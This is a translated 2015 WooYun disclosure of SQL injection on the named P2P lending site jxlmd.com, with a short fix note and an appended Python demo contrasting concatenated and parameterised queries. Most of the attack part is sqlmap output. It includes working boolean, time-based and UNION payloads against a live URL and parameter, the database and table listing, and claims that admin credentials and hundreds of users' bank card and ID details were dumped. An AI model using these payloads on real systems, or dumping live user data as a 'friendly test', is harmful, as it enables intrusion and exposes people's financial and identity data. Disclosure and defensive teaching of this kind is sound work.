
P2P security: SQL injection in 龙猫贷 (Longmaodai) leaks user bank card numbers and other information

2015-10-26 17:40

Information disclosure...

Proof of vulnerability:

Injection point:

http://www.jxlmd.com/shownews1.php?dirid=72&newsid=144

sqlmap identified the following injection points with a total of 54 HTTP(s) requests:
---
Parameter: newsid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: dirid=72&newsid=144 AND 1142=1142

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: dirid=72&newsid=144 AND (SELECT * FROM (SELECT(SLEEP(5)))eWcC)

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: dirid=72&newsid=-7333 UNION ALL SELECT NULL,CONCAT(0x7171706b71,0x6d7a6b43515870546953,0x71767a6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.3.15
back-end DBMS: MySQL 5.0.12



[*] information_schema
[*] lmd2014
[*] lmdlmd
[*] test
........
Database: lmd2014
[52 tables]
+---------------------+
| actionlogs          |
| activity            |
| admin               |
| adminroles          |
| area                |
| article             |
| assetstable         |
| autotender          |
| autotenderlogs      |
| backinterestdetails |
| backpassword        |
| banks               |
| biao                |
| biaopropertys       |
| borrowers           |
| capitalrecords      |
| cashwithdrawal      |
| city                |
| contract            |
| departments         |
| dir                 |
| emailconfig         |
| fkmessage           |
| hbtype              |
| hbxz                |
| hitsearchs          |
| htmltemplate        |
| interestdetails     |
| investment          |
| irmf                |
| lbpics              |
| loanapplication     |
| loginlog            |
| peoplemanagement    |
| prize               |
| prize_zj            |
| product             |
| province            |
| rechargerecord      |
| recommendeds        |
| riskreserve         |
| settings            |
| sysmessateusers     |
| sysmssage           |
| testtime            |
| testupdate          |
| tjmoney             |
| tjmoneylist         |
| torepaytheloan      |
| toundertakedetails  |
| userbanks           |
| usercontract        |
+---------------------+
.........



Quite a lot of tables; presumably quite a lot of data as well......

Administrator account and password:

[image: admin.jpg]

Bank card numbers and other details of some users.....

There are several hundred of them...

[image: Idcard.jpg]

Friendly test only, nothing was touched...



Fix:

After all, this is a P2P lending business; web security matters too.

Install security software and filter dangerous characters...

Source: www.wooyun.org/bugs/wooyun-2015-0139839
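Filtering dangerous characters is a weaker fix than keeping user input out of the SQL text altogether. As an added example that is not the site's own code, the sqlite3 stand-in below models the lookup behind shownews1.php (the table and column names are assumptions; the real backend is PHP on MySQL) and runs the report's boolean-based payload against a concatenated query and against a bound one:

```python
import sqlite3

# Constructed stand-in for the article lookup behind shownews1.php.
# The site's real schema is unknown; sqlite3, the table name and the
# column names are assumptions made for this example.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE article (newsid INTEGER, dirid INTEGER, title TEXT)")
    conn.executemany("INSERT INTO article VALUES (?, ?, ?)",
                     [(144, 72, "news 144"), (145, 72, "news 145")])
    return conn

def show_news_vulnerable(conn, dirid, newsid):
    # Raw request parameters are spliced into the SQL text, so a value such
    # as "144 AND 1142=1142" rewrites the WHERE clause instead of being
    # compared against the newsid column.
    sql = f"SELECT title FROM article WHERE dirid={dirid} AND newsid={newsid}"
    return [row[0] for row in conn.execute(sql)]

def show_news_safe(conn, dirid, newsid):
    # Type-check first, then bind: the values travel separately from the
    # statement and can never change its structure.
    try:
        dirid_i, newsid_i = int(dirid), int(newsid)
    except ValueError:
        return []  # reject the request instead of guessing what was meant
    sql = "SELECT title FROM article WHERE dirid=? AND newsid=?"
    return [row[0] for row in conn.execute(sql, (dirid_i, newsid_i))]

# The boolean-based blind oracle sqlmap reported: a true condition keeps the
# article in the result, a false one removes it, so every response leaks a
# bit about the database to whoever compares the two pages.
TRUE_PAYLOAD = "144 AND 1142=1142"
FALSE_PAYLOAD = "144 AND 1142=1143"

if __name__ == "__main__":
    db = make_db()
    print(show_news_vulnerable(db, "72", TRUE_PAYLOAD))   # ['news 144']
    print(show_news_vulnerable(db, "72", FALSE_PAYLOAD))  # []
    print(show_news_safe(db, "72", TRUE_PAYLOAD))         # [] (rejected)
    print(show_news_safe(db, "72", "144"))                # ['news 144']
```

The difference between the first two results is exactly the signal sqlmap used; the bound version returns the same page for every non-numeric value, which removes the oracle.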
